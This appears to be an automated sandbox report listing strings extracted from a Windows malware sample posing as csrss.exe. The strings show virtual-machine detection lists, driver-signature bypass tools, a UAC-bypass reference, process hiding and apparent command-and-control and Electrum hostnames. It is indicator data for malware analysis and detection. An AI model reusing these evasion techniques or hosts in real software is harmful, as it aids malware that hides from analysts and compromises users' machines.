Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe

Process information queried: ProcessInformation

Source: csrss.exe	Binary or memory string: derivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousev
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp	Binary or memory string: vmsrvc.exevmusrvc.exesmss.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewininit.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewinlogon.exevmsrvc.exevmusrvc.exeservices.exevmsrvc.exevmusrvc.exelsass.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedwm.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps
Source: csrss.exe	Binary or memory string: ayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp	Binary or memory string: vmusrvc.exe
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
Source: csrss.exe	Binary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero par
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp	Binary or memory string: svchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exespoolsv.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesihost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exectfmon.exevboxtray.exevboxservice.exeexplorer.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeSearchUI.exesearchui.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exedwm.exe$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp	Binary or memory string: svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exevmmouse$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp	Binary or memory string: qemuvirtual
Source: csrss.exe	Binary or memory string: ionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:asc
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: is unavailable()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWDefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp	Binary or memory string: vmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.execonhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeUsoClient.exeusoclient.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesgrmbroker.exevmsrvc.exevmusrvc.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exe
Source: csrss.exe	Binary or memory string: rinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwua
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp	Binary or memory string: smss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exedllhost.exesvchost.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exeUsoClient.exeusoclient.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesgrmbroker.exesvchost.exe4t4y4r89uz.exevmci$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp	Binary or memory string: GPU3LFU_3R1CloseHandleS-1-5-18nehalemkvmqemuvirtualpersoconProcess32FirstW[system process]vboxtray.exevboxservice.exeProcess32NextWSystemsystemvboxtray.exevboxservice.exeRegistryregistry
Source: csrss.exe	Binary or memory string: T_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:
Source: csrss.exe	Binary or memory string: minal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)clo
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: csrss.exe	Binary or memory string: licesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB) Value addr= base code= ctxt: curg= goid jobs= list= m->p= next= p->m= prev= span=%s: %s(...) , not , val -BEFV--DYOR-
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad RST markerbad allocCountbad record MACbad span statebad stack sizebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removedexit status -1file too largefinalizer waitgcstoptheworldgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedlookup TXT: %wmemprofilerateneed more datanil elem type!no module datano such deviceparse cert: %wprotocol errorread certs: %wreport_id is 0runtime: base=runtime: full=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytimeEndPeriodtoo many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
Source: csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp	Binary or memory string: 11VBoxSFVT(%d)WINDIRWib
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp	Binary or memory string: systemvboxtray.exe
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s%d%s/%s%s:%d%s=%s%v-%v"'&+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.webp156253.2.2500015000250003500045000550006560015600278125:**@:path<nil>AdlamAprilAttr(BamumBatakBuhidCall CountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521PGDSERangeRealmRunicSTermTakriTamilTypeAUUID=\u202allowarraybad nblackbrookchdirclosecloudcsrssdreamemptyfalsefaultfieldfloatfrostgcinggladegrassgreenhttpsimap2imap3imapsint16int32int64matchmistymkdirmonthmuddynightntohspanicpaperparsepgdsepop3sproudquietrangeriverrmdirroughrouterune sdsetshapesleepslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB)
Source: csrss.exe	Binary or memory string: verenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value>
Source: csrss.exe	Binary or memory string: nInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc() unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: acceptactiveautumnbitterbreezebrokenchan<-cherryclosedcookiedivinedomaindwarf.efenceempty exec: expectfloralflowerforestfrostygopherhangupheaderhiddenip+netkilledlistenlittlelivelymeadowminutenumberobjectpopcntpurplereadatreasonremoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> dying= flags= len=%d locks= m->g0= nmsys= s=nil
Source: csrss.exe	Binary or memory string: rayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-lang
Source: csrss.exe	Binary or memory string: main.isRunningInsideVMWare
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: entersyscallexit status found av: %sgcpacertracegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseFloatPhoenicianProcessingPulseEventRST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8casgstatuscmd is nilcomplex128connectiondnsapi.dlldsefix.exedwarf.Attre.keff.orgexitThreadexp mastergetsockoptgoroutine http_proxyimage/jpegimage/webpinvalidptrkeep-alivemSpanInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc()
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknamehttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextorannis.comparse errorprocess: %sraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion=183wininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> ancientany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scrimsonderivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwsarecvwsasendwup_verxen: %wxennet6 data=%q etypes goal
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp	Binary or memory string: vmsrvc.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp	Binary or memory string: xennetxennet6XA
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptyemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflatehttp2client=0if-none-matchimage/svg+xmlinvalid UTF-8invalid base kernel32.dllkey expansionlast-modifiedlevel 3 resetload64 failedlogs endpointmaster secretname is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparse URL: %wparsing time powrprof.dllprl_tools.exerebooting nowscvg: inuse: servers countservice statesigner is nilsocks connectsrmount errorstill in listtimer expiredtrailing datatriggerRatio=unimplementedunsupported: user canceledvalue method verifier hashverifier hostvirtualpc: %wxadd64 failedxchg64 failed}
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp	Binary or memory string: vboxservice.exe
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: (MISSING)(unknown)+infinity, newval=, oldval=-07:00:00-infinity/api/cdn?/api/poll244140625: status=; Domain=Accuracy(AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]atomicor8b.ooze.ccbad indirbillowingbroadcastbus errorbutterflychallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0ecdsa.netempty urlfn.48.orgfodhelperfork/execfuncargs(gdi32.dllimage/gifimage/pnginterfaceinterruptipv6-icmplingeringlocalhostmSpanDeadmSpanFreemulticastnew tokennil errorntdll.dllole32.dllomitemptypanicwaitpatch.exepclmulqdqprecisionprintableprotocol psapi.dllraw-writereboot inrecover: reflect: resonancerwxrwxrwxscheduledsnowflakesparklingsucceededtask %+v
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp	Binary or memory string: vboxtray.exe
Source: csrss.exe	Binary or memory string: tUsage of %s: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp	Binary or memory string: vboxtray.exevboxservice.exesmss.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewininit.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewinlogon.exevboxtray.exevboxservice.exeservices.exevboxtray.exevboxservice.exelsass.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedwm.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeHxTsr.exehxtsr.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.execonhost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeUsoClient.exeusoclient.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesv
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: unknown network workbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectDnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfractional secondgp.waiting != nilhandshake failureif-modified-sinceillegal parameterimpersonation: %win string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedpseudo-device: %sread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunknown caller pcwait for GC cyclewine_get_version
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327572896.00000000160C4000.00000004.00000001.sdmp	Binary or memory string: Microsoft Windows 10 ProHKEY_USERS\ardz\Desktop\4t4y4r89UZ.exe" "C:\Users\user\Desktop\4t4y4r89UZ.exe" S-1-5-21-3853321935-2125563209-4053062332-1002RoughSnowFirstInstallDateIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzc:\users\user\desktop\4t4y4r89uz.exeintel(r) core(tm)2 cpu 6600 @ 2.40 